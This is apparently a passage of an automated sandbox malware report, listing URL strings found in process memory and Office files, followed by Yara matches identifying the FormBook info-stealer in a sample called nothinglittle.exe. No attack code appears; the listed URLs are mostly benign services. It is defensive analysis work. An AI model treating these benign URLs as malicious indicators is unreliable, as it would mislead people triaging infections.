Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.office.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://augloop.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.entity.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://cr.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://directory.services.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.windows.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows.local
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://management.azure.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://management.azure.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: nothinglittle.exe.9.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: nothinglittle.exe.9.dr	String found in binary or memory: https://sectigo.com/CPS0U
Source: nothinglittle.exe.9.dr	String found in binary or memory: https://secure.comodo.com/CPS0L
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://tasks.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/7
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=06
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
